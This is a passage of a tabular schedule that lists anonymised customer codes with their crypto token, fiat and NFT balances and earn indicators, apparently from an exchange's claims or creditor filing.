| 07347614 | | USD[10.00] | | |
| 07347616 | | BTC[0], DOGE[1], ETH[0], USD[0.00] | | |
| 07347617 | | USD[10.00] | | |
| 07347618 | | USD[0.01], USDT[0] | | |
| 07347619 | | BAT[2], CUSDT[15], ETH[.00613694], ETHW[.00613694], LINK[5.86934477], SHIB[1], TRX[3], USD[8.60] | | |
| 07347620 | | USD[10.00] | | |
| 07347622 | | USD[0.00] | | |
| 07347623 | | USD[0.00] | | |
| 07347624 | | CUSDT[19], GRT[1.00367791], USD[0.01], USDT[0.00000001] | Yes | |
| 07347625 | | USD[10.00] | | |
| 07347627 | | BRZ[1], BTC[.00224101], CUSDT[16], DOGE[3], ETH[.11172825], ETHW[.11061959], SHIB[2], USD[0.00] | Yes | |
| 07347628 | | USD[10.00] | | |
| 07347629 | | DOGE[1], USD[0.00] | Yes | |
| 07347630 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07347631 | | USD[10.00] | | |
| 07347632 | | BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.02] | | |
| 07347633 | | LINK[.00346252], SOL[.00098852], USD[0.00] | Yes | |
| 07347634 | | USD[10.00] | | |
| 07347635 | | BTC[0], DOGE[.2045], USD[0.00] | | |
| 07347636 | | BTC[.00020417], DOGE[687.39179908], USD[0.00] | | |
| 07347637 | | DOGE[197.65572405], USD[0.00] | | |
| 07347638 | | USD[10.00] | | |
| 07347639 | | USD[10.00] | | |
| 07347640 | | DOGE[1274.69242907], ETH[.1259463], SHIB[2], TRX[1], USD[0.00] | | |
| 07347641 | | LINK[.19583774], USD[0.00] | | |
| 07347642 | | USD[10.00] | | |
| 07347644 | | DOGE[0], USD[0.00] | Yes | |
| 07347645 | | CUSDT[1], DOGE[.00003885], USD[0.00] | Yes | |
| 07347646 | | SHIB[0], USD[0.00], USDT[0] | Yes | |
| 07347647 | | USD[10.00] | | |
| 07347648 | | BRZ[2], CUSDT[8], DOGE[11455.56140087], TRX[.99433855], USD[0.78], USDT[2] | | |
| 07347649 | | USD[10.00] | | |
| 07347650 | | CUSDT[5], DOGE[500.00001692], SOL[.99997941], TRX[4], USD[0.00] | | |
| 07347651 | | DOGE[100.68883351], SHIB[1], TRX[3.60348572], USD[3.34] | | |
| 07347652 | | USD[10.00] | | |
| 07347653 | | USD[10.00] | | |
| 07347654 | | USD[10.00] | | |
| 07347655 | | USD[10.00] | | |
| 07347656 | | CUSDT[4], DOGE[200.44392765], USD[0.00] | | |
| 07347657 | | USD[0.00] | | |
| 07347658 | | CUSDT[1], DOGE[.00770961], USD[0.00], USDT[0] | Yes | |
| 07347659 | | TRX[96.53351059], USD[0.00] | | |
| 07347660 | | CUSDT[1], DOGE[294.00048152], USD[63.42] | Yes | |
| 07347661 | | UNI[.45086153], USD[0.00] | | |
| 07347662 | | DOGE[0], GRT[.00000085], USD[0.01] | | |
| 07347663 | | BTC[.00049600], CUSDT[1], DOGE[0.01828587], ETH[0], ETHW[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07347665 | | USD[10.00] | | |
| 07347666 | | USD[10.00] | | |
| 07347667 | | USD[10.00] | | |
| 07347668 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347669 | | CUSDT[3], ETH[.01391337], ETHW[.01391337], USD[0.01] | | |
| 07347670 | | USD[10.00] | | |
| 07347671 | | BRZ[2], BTC[0], CUSDT[8], DOGE[5], ETH[0], ETHW[0.02822047], GRT[0], LINK[0], LTC[0], NFT (345246799492050392/Romeo #1071)[1], NFT (408281044441911276/Humpty Dumpty #907)[1], SOL[0], SUSHI[0], TRX[13], USD[0.00], YFI[0] | | |
| 07347672 | | BAT[5.40313799], DOGE[0], NFT (401539252750773518/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #33)[1], NFT (413807985093110872/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #9)[1], USD[0.01], USDT[0] | Yes | |
| 07347673 | | DOGE[1.00000579], USD[0.01] | | |
| 07347674 | | USD[10.00] | | |
| 07347675 | | BRZ[4], CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07347676 | | USD[10.00] | | |
| 07347677 | | BRZ[1], CUSDT[1], DOGE[1.00000074], USD[0.01] | Yes | |
| 07347680 | | DOGE[178.61092177], NFT (564537662705716243/Computer Generated Dino CGD #47)[1], NFT (573201378406479257/CREEPY MINI #16)[1], SHIB[1], USD[2.93] | Yes | |
| 07347681 | | USD[10.00] | | |
| 07347682 | | BRZ[2], CUSDT[6], DOGE[0], ETH[.00010354], ETHW[.00010354], GRT[1], TRX[6], USD[0.00], USDT[0.00705580] | | |
| 07347683 | | USD[10.00] | | |
| 07347684 | | USD[0.00] | Yes | |
| 07347686 | | USD[0.00] | | |
| 07347688 | | CUSDT[9], DOGE[0.48282975], SOL[0], TRX[1], USD[0.55] | Yes | |
| 07347689 | | USD[10.00] | | |
| 07347691 | | USD[10.00] | | |
| 07347692 | | USD[0.20], USDT[0] | | |
| 07347694 | | USD[10.00] | | |
| 07347695 | | USD[0.57] | | |
| 07347696 | | DOGE[23.63062032], USD[0.00] | | |
| 07347697 | | USD[10.00] | | |
| 07347698 | | DOGE[145.69889574], TRX[850.880119], USD[0.00] | | |
| 07347699 | | BRZ[4], BTC[.00500837], CUSDT[11], DOGE[1199.56851942], ETH[.07506263], ETHW[.07506263], GRT[13.21499184], TRX[76.1744138], USD[9.40], USDT[1] | | |
| 07347700 | | USD[10.00] | | |
| 07347701 | | SOL[0.00000652], USD[0.00] | Yes | |
| 07347702 | | BTC[.00000001], SHIB[1], USD[0.00] | Yes | |
| 07347703 | | CUSDT[8], DOGE[1], TRX[1], USD[0.59] | | |
| 07347704 | | SOL[0.02661469] | | |
| 07347705 | | CUSDT[2], DOGE[808.18701915], USD[0.00] | | |
| 07347706 | | DOGE[6.22700155], TRX[26.85779746], USD[0.00] | Yes | |
| 07347707 | | CUSDT[1], USD[0.00] | | |
| 07347708 | | USD[10.00] | | |
| 07347709 | | USD[10.00] | | |
| 07347710 | | USD[0.00] | | |
| 07347711 | | BTC[.00002943], CUSDT[1.00290007], DOGE[172.85829849], USD[10.00] | | |
| 07347712 | | LINK[.57889729], USD[0.00] | Yes | |
| 07347713 | | DOGE[0.56262630], ETH[0], TRX[98.76266888], USD[0.41], USDT[0.00000001] | | |
| 07347714 | | USD[10.00] | | |
| 07347715 | | DOGE[712.793378], USD[0.00] | | |
| 07347716 | | USD[0.00] | | |
| 07347717 | | CUSDT[10.53126108], DOGE[0], ETH[0], GRT[0.00029275], SOL[0], SUSHI[0], TRX[2], USD[0.00] | | |
| 07347718 | | DOGE[141.42689269], TRX[1], USD[0.00] | | |
| 07347719 | | USD[7.77] | | |
| 07347721 | | USD[10.00] | | |
| 07347722 | | USD[10.00] | | |
| 07347724 | | USD[10.00] | | |
| 07347726 | | ETHW[.05358606], SHIB[128771.10054234], SOL[.00001103], USD[0.00] | Yes | |
| 07347727 | | USD[10.00] | | |
| 07347728 | | BTC[.00133948], CUSDT[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07347729 | | USD[10.00] | | |
| 07347730 | | USD[10.00] | | |
| 07347732 | | CUSDT[1], DOGE[103.89229204], USD[0.00] | | |
| 07347733 | | BRZ[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], KSHIB[0], LINK[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07347734 | | USD[10.00] | | |
| 07347735 | | USD[0.00], USDT[0.00000001] | | |
| 07347736 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347737 | | AVAX[1.35320761], NFT (568202749020224036/Entrance Voucher #2892)[1], SHIB[2], USD[0.00] | Yes | |
| 07347738 | | USD[10.00] | | |
| 07347739 | | USD[10.00] | | |
| 07347740 | | BRZ[1], CUSDT[1], DOGE[0], USD[0.01], USDT[1.10515011] | Yes | |
| 07347741 | | BTC[.00351189], DOGE[3715.68112281], TRX[1129.42720267], USD[516.37] | | |
| 07347742 | | USD[10.00] | | |
| 07347743 | | DOGE[171.19301241], USD[10.00] | | |
| 07347744 | | USD[19.71] | | |
| 07347745 | | CUSDT[2], DOGE[208.83940264], TRX[1], USD[0.00] | | |
| 07347746 | | DOGE[1], SUSHI[.66757461], USD[0.00] | | |
| 07347747 | | BRZ[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07347749 | | ALGO[8.89059694], DAI[4.55409694], TRX[0], USD[0.00] | Yes | |
| 07347750 | | USD[10.00] | | |
| 07347751 | | CUSDT[8], TRX[784.80639815], USD[0.00], USDT[0.00000001] | Yes | |
| 07347752 | | CUSDT[3], DOGE[1], USD[0.01] | | |
| 07347753 | | USD[10.00] | | |
| 07347754 | | USD[10.00] | | |
| 07347755 | | BTC[0], DOGE[7], USD[0.12] | | |
| 07347756 | | USD[0.00] | | |
| 07347757 | | DOGE[1], ETH[0], ETHW[0], USD[0.01] | | |
| 07347758 | | USD[10.00] | | |
| 07347759 | | USD[10.00] | | |
| 07347760 | | USD[0.00] | | |
| 07347761 | | ETH[.0042891], ETHW[.0042891], USD[0.00] | | |
| 07347762 | | DOGE[14.33400396], TRX[.00999865], USD[0.00] | | |
| 07347763 | | USD[10.00] | | |
| 07347764 | | BTC[0], DOGE[1], TRX[.00002496], USD[0.00] | | |
| 07347765 | | USD[20.00] | | |
| 07347766 | | USD[10.00] | | |
| 07347767 | | USD[10.00] | | |
| 07347768 | | BAT[1], BRZ[1], CUSDT[1], DOGE[1], TRX[2], UNI[1], USD[0.00], USDT[0] | | |
| 07347769 | | LTC[0], USD[0.00] | Yes | |
| 07347770 | | USD[10.00] | | |
| 07347771 | | USD[10.00] | | |
| 07347772 | | USD[10.00] | | |
| 07347773 | | USD[0.00] | Yes | |
| 07347775 | | ETHW[19.85392126], USD[0.00] | | |
| 07347776 | | USD[10.00] | | |
| 07347777 | | USD[0.01] | | |
| 07347778 | | USD[11.07] | Yes | |
| 07347779 | | USD[10.00] | | |
| 07347780 | | USD[10.00] | | |
| 07347781 | | BTC[.00018077], USD[0.00] | | |
| 07347782 | | USD[0.00] | | |
| 07347783 | | USD[10.00] | | |
| 07347785 | | DOGE[7], SHIB[4554686.69360852], SOL[10.92151637], TRX[1], USD[0.00], USDT[0] | | |
| 07347786 | | DOGE[1.27932068], USD[65.45] | | |
| 07347787 | | USD[11.01] | Yes | |
| 07347788 | | USD[10.00] | | |
| 07347789 | | BRZ[0.00000003], BTC[0], CUSDT[2.00005359], LTC[.03773111], SHIB[3], USD[0.00], USDT[0.00004431] | | |
| 07347790 | | USD[10.00] | | |
| 07347791 | | USD[0.00] | Yes | |
| 07347792 | | USD[0.00] | | |
| 07347793 | | USD[10.00] | | |
| 07347795 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07347796 | | USD[10.00] | | |
| 07347798 | | USD[10.00] | | |
| 07347799 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347800 | | DOGE[1], GRT[1.98906997], SOL[.05295469], USD[0.00] | | |
| 07347801 | | USD[0.00] | | |
| 07347802 | | BCH[.26502974], USD[10.00] | | |
| 07347803 | | BTC[.00015782], ETH[.0005531], ETHW[.0005531], LTC[.00517171], USD[0.00] | | |
| 07347804 | | USD[10.00] | | |
| 07347805 | | BRZ[0], CUSDT[2], DOGE[0], ETH[0], TRX[1], USD[0.01] | | |
| 07347806 | | DOGE[1], USD[0.00] | | |
| 07347807 | | BAT[0], DOGE[0], LTC[0], SOL[0], TRX[33.01374302], USD[0.00], USDT[0] | Yes | |
| 07347808 | | BTC[0], DOGE[6.97200000], ETH[0], USD[0.03], USDT[0] | | |
| 07347809 | | USD[10.00] | | |
| 07347810 | | USD[5.69], USDT[0.92584590] | | |
| 07347811 | | USD[10.00] | | |
| 07347812 | | USD[10.00] | | |
| 07347813 | | DOGE[0], TRX[0], USD[0.00] | | |
| 07347814 | | USD[10.00] | | |
| 07347815 | | BRZ[1], CUSDT[2], DOGE[3746.03075941], USD[0.00] | | |
| 07347816 | | CUSDT[3], DOGE[1], USD[0.00] | | |
| 07347817 | | USD[10.00] | | |
| 07347818 | | USD[10.00] | | |
| 07347819 | | USD[10.00] | | |
| 07347820 | | CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07347821 | | USD[0.00] | | |
| 07347822 | | CUSDT[1338.40672293], DOGE[2899.9352897], USD[0.00] | Yes | |
| 07347823 | | BTC[.000223], USD[0.00] | | |
| 07347824 | | BTC[.00010651], CUSDT[1], DOGE[.94501908], SHIB[521226.43275776], TRX[1], USD[0.01] | Yes | |
| 07347825 | | BAT[1.01110166], DOGE[1], ETH[0], GRT[1.00252145], SOL[0], USD[0.00] | Yes | |
| 07347827 | | USD[10.00] | | |
| 07347828 | | DOGE[989.538], TRX[2328.3086], USD[0.14] | | |
| 07347829 | | BAT[1], CUSDT[2], TRX[1], USD[10.00] | | |
| 07347832 | | USD[0.00] | | |
| 07347833 | | USD[10.00] | | |
| 07347835 | | CUSDT[379.68911386], USD[0.00] | | |
| 07347836 | | BTC[0], DOGE[0], GRT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07347837 | | USD[10.00] | | |
| 07347838 | | USD[10.00] | | |
| 07347839 | | BRZ[.00508188], DOGE[1.01376143], ETH[.00000061], ETHW[.00000061], MATIC[.00110446], SHIB[83.36293954], TRX[.01396416], USD[0.21] | Yes | |
| 07347840 | | BAT[1], BRZ[2], CUSDT[3], GRT[2], TRX[3], USD[0.00] | | |
| 07347842 | | BRZ[1], BTC[.00212047], CUSDT[8], DOGE[9053.3110913], ETH[.04493109], ETHW[.04493109], LINK[3.7323872], TRX[2176.85559372], USD[0.87] | | |
| 07347843 | | USD[10.00] | | |
| 07347844 | | DOGE[151.57952466], USD[0.00] | Yes | |
| 07347845 | | BF_POINT[100], ETHW[.39079243], USD[1053.16] | | |
| 07347846 | | CUSDT[1], DOGE[.95018756], USD[17.92] | | |
| 07347847 | | BRZ[1], CUSDT[2], DOGE[115.65055725], TRX[347.45961043], USD[1.25], USDT[0] | Yes | |
| 07347848 | | USD[0.01] | | |
| 07347849 | | DOGE[1], USD[0.01] | | |
| 07347850 | | DOGE[3322.18333762], SHIB[145264.38117373], TRX[1], USD[0.00] | | |
| 07347851 | | USD[10.00] | | |
| 07347852 | | NFT [507386425726769886/Hall of Fantasy League #194][1], NFT [515325892641641884/Entrance Voucher #4002][1], USD[0.01], USDT[0.00000001] | Yes | |
| 07347853 | | DOGE[147.78767758], USD[0.00] | | |
| 07347854 | | USD[0.00] | | |
| 07347855 | | GRT[1.00398969], TRX[1421.62961499], USD[0.00] | Yes | |
| 07347856 | | BRZ[2], CUSDT[2], DOGE[3309.50364376], TRX[1], USD[0.00] | | |
| 07347857 | | BRZ[1], DOGE[.00004167], TRX[1], USD[0.03] | | |
| 07347858 | | DOGE[1253.45304833], USD[3.00] | | |
| 07347859 | | BRZ[1], CUSDT[1], DOGE[23871.10276952], GRT[1], UNI[1], USD[0.00] | | |
| 07347860 | | CUSDT[4], USD[0.00], YFI[.00054974] | | |
| 07347861 | | CUSDT[1], SHIB[1], TRX[1], USD[0.00] | | |
| 07347863 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347864 | | BRZ[1], CUSDT[2], DOGE[.4928735], TRX[4], USD[0.00] | | |
| 07347865 | | BTC[.0794988], DOGE[2203.00775435], TRX[1], USD[10.36] | Yes | |
| 07347866 | | BTC[0], USD[0.05] | | |
| 07347867 | | USD[0.01] | | |
| 07347868 | | USD[10.00] | | |
| 07347869 | | USD[10.00] | | |
| 07347870 | | GRT[1], USD[0.01], USDT[0.00000001] | Yes | |
| 07347871 | | ETH[.00568068], ETHW[.00568068], USD[0.00] | | |
| 07347872 | | USD[10.00] | | |
| 07347873 | | CUSDT[1], USD[0.00] | | |
| 07347874 | | USD[10.00] | | |
| 07347875 | | DOGE[.01358634], SHIB[1], USD[0.01] | | |
| 07347876 | | BRZ[0], BTC[0], ETH[0], ETHW[0], LINK[0], SOL[1.24494524], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07347877 | | USD[10.00] | | |
| 07347878 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07347879 | | ETH[.00367921], ETHW[.00367921], USD[0.00] | | |
| 07347880 | | CUSDT[2], DOGE[3], USD[0.00], USDT[0] | | |
| 07347881 | | CUSDT[3], DOGE[13.60385857], TRX[1], USD[0.01] | | |
| 07347882 | | USD[10.00] | | |
| 07347883 | | USD[0.33] | Yes | |
| 07347884 | | USD[10.00] | | |
| 07347885 | | DOGE[898.29403188], USD[0.25] | Yes | |
| 07347886 | | BAT[1.56182924], CUSDT[2], LINK[1.10533182], USD[0.00], USDT[0] | Yes | |
| 07347887 | | DOGE[1690.27473387], TRX[1], USD[10.00] | | |
| 07347888 | | DOGE[22.46460835], USD[0.00] | | |
| 07347889 | | DOGE[1], TRX[1], USD[112.98] | | |
| 07347890 | | SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07347891 | | USD[10.00] | | |
| 07347892 | | USD[10.00] | | |
| 07347893 | | BRZ[1], BTC[.00000104], CUSDT[10], DAI[0], DOGE[0.00650090], ETHW[.56211561], GRT[0.23087239], LINK[30.64309730], NFT (31182463898929703B/Bahrain Ticket Stub #1396)[1], PAXG[.00009761], SHIB[.00000005], TRX[8], UNI[6.58536906], USD[0.00], USDT[1.02062997], YFI[.00907973] | Yes | |
| 07347894 | | AAVE[0], CUSDT[1], TRX[2], USD[0.00] | Yes | |
| 07347895 | | BAT[1.01655549], BRZ[2], CUSDT[6], DOGE[2143.78357718], TRX[4], USD[8.36] | Yes | |
| 07347896 | | BF_POINT[100], CUSDT[7], SHIB[4], TRX[7], USD[754.52], USDT[0] | Yes | |
| 07347897 | | BCH[.24943542], BRZ[1], CUSDT[4], DOGE[57143.18500155], ETH[.18546927], ETHW[.18546927], LINK[4.42206915], LTC[.77270152], SUSHI[19.04649125], TRX[1692.77688893], UNI[3.52555307], USD[6.51] | | |
| 07347898 | | USD[10.00] | | |
| 07347899 | | USD[10.00] | | |
| 07347900 | | CUSDT[5], DOGE[1], SOL[.11198562], TRX[1], USD[0.00] | Yes | |
| 07347901 | | USD[0.00] | | |
| 07347902 | | CUSDT[1], DOGE[.58683044], USD[0.01] | | |
| 07347903 | | USD[0.01] | | |
| 07347904 | | BRZ[1], BTC[.00000599], CUSDT[11], TRX[1], USD[0.00] | Yes | |
| 07347905 | | USD[10.00] | | |
| 07347906 | | USD[10.00] | | |
| 07347907 | | DOGE[27.48082003], USD[0.00] | | |
| 07347908 | | USD[10.00] | | |
| 07347909 | | DOGE[26.96701739], USD[0.00] | | |
| 07347910 | | BRZ[1], BTC[.00000001], CUSDT[10], ETH[.00000023], ETHW[.00000023], SHIB[8], TRX[4], USD[0.01] | Yes | |
| 07347911 | | BTC[0], DOGE[.41599304], LINK[0], USD[0.00], USDT[0] | | |
| 07347913 | | USD[10.00] | | |
| 07347914 | | USD[10.00] | | |
| 07347915 | | USD[10.00] | | |
| 07347916 | | USD[10.00] | | |
| 07347917 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07347918 | | USD[10.00] | | |
| 07347919 | | USD[10.00] | | |
| 07347920 | | CUSDT[1], DOGE[808.87621937], USD[10.00] | | |
| 07347921 | | USD[10.61] | Yes | |
| 07347922 | | DOGE[188.42593683], USD[0.00] | | |
| 07347923 | | USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347924 | | USD[10.00] | | |
| 07347925 | | USD[0.00] | | |
| 07347926 | | USD[10.00] | | |
| 07347927 | | USD[10.00] | | |
| 07347929 | | BTC[0], LINK[.21708636], USD[0.00] | | |
| 07347930 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07347931 | | ETH[.00283865], ETHW[.00279761], USD[0.00] | Yes | |
| 07347932 | | BRZ[2], CUSDT[1], DOGE[0], TRX[3], USD[0.30], USDT[1] | | |
| 07347933 | | USD[10.00] | | |
| 07347934 | | CUSDT[1007.13689597], DOGE[7756.60167473], SHIB[4600939.83847234], TRX[304.95788082], USD[676.95] | Yes | |
| 07347935 | | USD[10.00] | | |
| 07347936 | | BAT[.383], BCH[.000406], BTC[.0000453], DOGE[55.619], ETH[.000983], ETHW[.000983], GRT[.57], LINK[.0358], LTC[.00475], MATIC[9.7], SOL[.083], SUSHI[.404], TRX[.834], UNI[.0618], USD[0.00] | | |
| 07347937 | | CUSDT[3], DOGE[11587.99221758], TRX[1], USD[0.00] | | |
| 07347938 | | USD[10.00] | | |
| 07347939 | | SHIB[5860.69837587], TRX[1], USD[0.01] | | |
| 07347940 | | USD[10.00] | | |
| 07347941 | | USD[10.00] | | |
| 07347942 | | USD[12.62], USDT[0.00001984] | Yes | |
| 07347943 | | LTC[.05459221], USD[0.00] | | |
| 07347944 | | ALGO[31.66467873], SHIB[1], USD[0.00] | Yes | |
| 07347945 | | CUSDT[48.83364735], DOGE[40.65700755], USD[0.00] | | |
| 07347946 | | USD[0.00], USDT[0] | | |
| 07347947 | | USD[10.00] | | |
| 07347948 | | USD[10.00] | | |
| 07347949 | | DOGE[37361.56991269], ETH[.20379313], ETHW[.20357923], USD[2.94] | Yes | |
| 07347950 | | DOGE[0], UNI[0], USD[83.34] | | |
| 07347951 | | BAT[68.39414549], BCH[.04982336], BRZ[1], CUSDT[1171.97993221], DOGE[232.3256497], GRT[31.33868994], LINK[.21597644], LTC[.46215195], SOL[2.90892776], SUSHI[15.87582423], TRX[2078.64988484], UNI[.26442389], USD[0.01], YFI[.00048717] | | |
| 07347952 | | USD[110.00] | | |
| 07347953 | | USD[35.00] | | |
| 07347954 | | USD[10.00] | | |
| 07347956 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07347957 | | BRZ[0], DOGE[500.61224390], ETH[0], KSHIB[0], LTC[0], SHIB[19168284.94294417], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07347958 | | BRZ[0], DOGE[1687.99533168], TRX[0], USD[25.00], USDT[1] | | |
| 07347959 | | USD[10.00] | | |
| 07347960 | | DOGE[0], USD[0.01] | | |
| 07347961 | | CUSDT[2], DOGE[24.73177218], SUSHI[.92354021], USD[56.47] | | |
| 07347962 | | USD[0.01] | | |
| 07347963 | | BCH[.00000099], BRZ[1], BTC[.00000003], CUSDT[9], ETH[.00000034], ETHW[.00000034], LTC[.00000781], SHIB[6], SUSHI[.00021756], TRX[3], UNI[.00007884], USD[0.01] | Yes | |
| 07347964 | | CUSDT[1], DOGE[644.80397067], NFT (438483512839525592/Entrance Voucher #3287)[1], USD[0.00] | Yes | |
| 07347965 | | USD[0.00] | | |
| 07347966 | | DOGE[.24756615], USD[10.44] | | |
| 07347967 | | USD[10.00] | | |
| 07347968 | | USD[0.06] | | |
| 07347969 | | ALGO[70.84504675], BRZ[2], BTC[.00032807], DOGE[588.59344377], ETH[.0324918], ETHW[.01716763], GRT[.38428885], LINK[2.17217396], LTC[1.12913009], MATIC[56.91488554], NEAR[.72538547], NFT (553988665904409372/#4364)[1], SHIB[2], SOL[2.37843453], TRX[1], USD[0.00] | Yes | |
| 07347970 | | BTC[.00037906], USD[0.00] | | |
| 07347971 | | BTC[0], ETH[0], GRT[0], SHIB[.26158631], TRX[0], USD[0.00] | Yes | |
| 07347972 | | LINK[.43114481], SUSHI[.68580755], USD[0.00] | | |
| 07347973 | | AUD[1.28], BAT[2.86134773], BRZ[5.31532388], CAD[1.25], DAI[.9923247], ETH[.00058109], ETHW[.00058109], EUR[0.82], GBP[0.72], GRT[1.12563378], PAXG[.00053919], SGD[1.31], SOL[.16675417], SUSHI[.06971891], TRX[1], USD[1.00], USDT[.99371215], YFI[.00003118] | | |
| 07347974 | | USD[10.00] | | |
| 07347975 | | USD[10.00] | | |
| 07347976 | | USD[0.01] | | |
| 07347977 | | CUSDT[9], DOGE[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07347978 | | USD[10.00] | | |
| 07347979 | | BAT[3], BRZ[6], BTC[0], CUSDT[1], DOGE[1], GRT[1], SUSHI[1], TRX[1], USD[0.01], USDT[4] | | |
| 07347981 | | CUSDT[5], USD[0.00], USDT[0] | | |
| 07347982 | | BAT[1.01655549], BRZ[1], CUSDT[1], DOGE[.02127821], USD[0.01] | Yes | |
| 07347983 | | CUSDT[2], DOGE[1], ETH[0], GRT[1], TRX[1], USD[0.01], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07347985 | | USD[0.38] | | |
| 07347987 | | DOGE[24.13478209], USD[0.00] | Yes | |
| 07347988 | | USD[10.00] | | |
| 07347989 | | BAT[1], BRZ[7.74342341], CUSDT[4], DOGE[17290.79984538], ETH[0.00000088], ETHW[0.00000088], GRT[3.18179581], LINK[0], TRX[3], USD[0.00] | Yes | |
| 07347990 | | USD[10.00] | | |
| 07347991 | | BTC[0], DOGE[0], ETH[0.00012842], ETHW[0.00012842], USD[0.00], USDT[0] | Yes | |
| 07347994 | | CUSDT[14], TRX[4], USD[0.00], USDT[0] | | |
| 07347995 | | BRZ[1], CUSDT[1], DOGE[.77150354], TRX[1], USD[0.96] | | |
| 07347996 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07347997 | | USD[10.00] | | |
| 07347998 | | DOGE[0], ETH[1.23609925], ETHW[.75382516], GRT[0], SHIB[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07347999 | | USD[10.00] | | |
| 07348000 | | USD[10.00] | | |
| 07348001 | | BTC[0], CUSDT[1], DOGE[14.95123093], USD[0.00], USDT[0] | | |
| 07348002 | | USD[10.00] | | |
| 07348003 | | DOGE[5.25014695], USD[0.00] | | |
| 07348005 | | USD[10.00] | | |
| 07348006 | | USD[10.00] | | |
| 07348007 | | USD[10.00] | | |
| 07348008 | | USD[10.00] | | |
| 07348009 | | USD[10.00] | | |
| 07348010 | | BRZ[1], DOGE[1.00006772], TRX[2], USD[0.01] | | |
| 07348011 | | BRZ[1], USD[263.41], USDT[0] | | |
| 07348012 | | USD[10.00] | | |
| 07348013 | | TRX[1], USD[0.00] | | |
| 07348014 | | USD[10.00] | | |
| 07348016 | | BTC[.00017478], ETH[.00000012], ETHW[.00000012], USD[0.00] | | |
| 07348017 | | CUSDT[7], TRX[4], USD[0.01], USDT[0] | | |
| 07348018 | | USD[10.00] | | |
| 07348019 | | USD[0.07] | | |
| 07348020 | | DOGE[.00041314], GRT[1], TRX[1], USD[0.01] | | |
| 07348021 | | USD[0.00] | | |
| 07348022 | | CUSDT[1], USD[0.00] | | |
| 07348023 | | USD[10.00] | | |
| 07348024 | | USD[0.00] | | |
| 07348025 | | USD[10.00] | | |
| 07348026 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07348027 | | DOGE[27.54513813], USD[0.26] | | |
| 07348028 | | TRX[183.35375282], USD[0.00] | | |
| 07348029 | | USD[10.00] | | |
| 07348031 | | BTC[.00028792], DOGE[2], ETH[.00783265], ETHW[.00783265], USD[10.00] | | |
| 07348034 | | USD[0.00] | | |
| 07348037 | | BRZ[0], BTC[0], DOGE[0], GRT[0], SUSHI[0], USD[0.01] | | |
| 07348038 | | LINK[.24029299], USD[0.00] | | |
| 07348040 | | BAT[0], DOGE[0], GRT[1], LTC[.00001924], NFT (31350693184121932/DRIP NFT)[1], NFT (44788277801648007/Little Rocks #846)[1], SHIB[5], SOL[.30157955], SUSHI[0], TRX[2], USD[3.22], USDT[0] | Yes | |
| 07348042 | | USD[10.00] | | |
| 07348043 | | DOGE[5], MATIC[2721.39090654], NFT (293935010398315390/Pixels #3631)[1], NFT (317370446474013404/StarAtlas Anniversary)[1], NFT (319236600790019012/StarAtlas Anniversary)[1], NFT (347607428038985185/StarAtlas Anniversary)[1], NFT (402554025686319894/StarAtlas Anniversary)[1], NFT (454907438895773202/Entrance Voucher #1037)[1], NFT (485025927296181097/StarAtlas Anniversary)[1], NFT (522786642855914443/StarAtlas Anniversary)[1], NFT (531093233488371955/Matrica 3D Cube)[1], NFT (544800596644711085/StarAtlas Anniversary)[1], NFT (547691423858257850/StarAtlas Anniversary)[1], SHIB[4], SOL[15.96175855], TRX[2855.79385779], USD[0.00], USDT[1.05625570] | Yes | |
| 07348044 | | USD[10.00] | | |
| 07348045 | | USD[10.00] | | |
| 07348046 | | USD[48.00] | | |
| 07348047 | | BRZ[1], CUSDT[3], GRT[1], SHIB[1], USD[0.00] | | |
| 07348048 | | BRZ[1], CUSDT[3], DOGE[1.35680241], TRX[1], USD[0.90] | | |
| 07348049 | | CUSDT[3], DOGE[489.21352454], SOL[.53750566], TRX[33.27105988], USD[0.00] | | |
| 07348050 | | USD[10.00] | | |
| 07348051 | | USD[10.00] | | |
| 07348053 | | TRX[1], USD[35.84] | | |

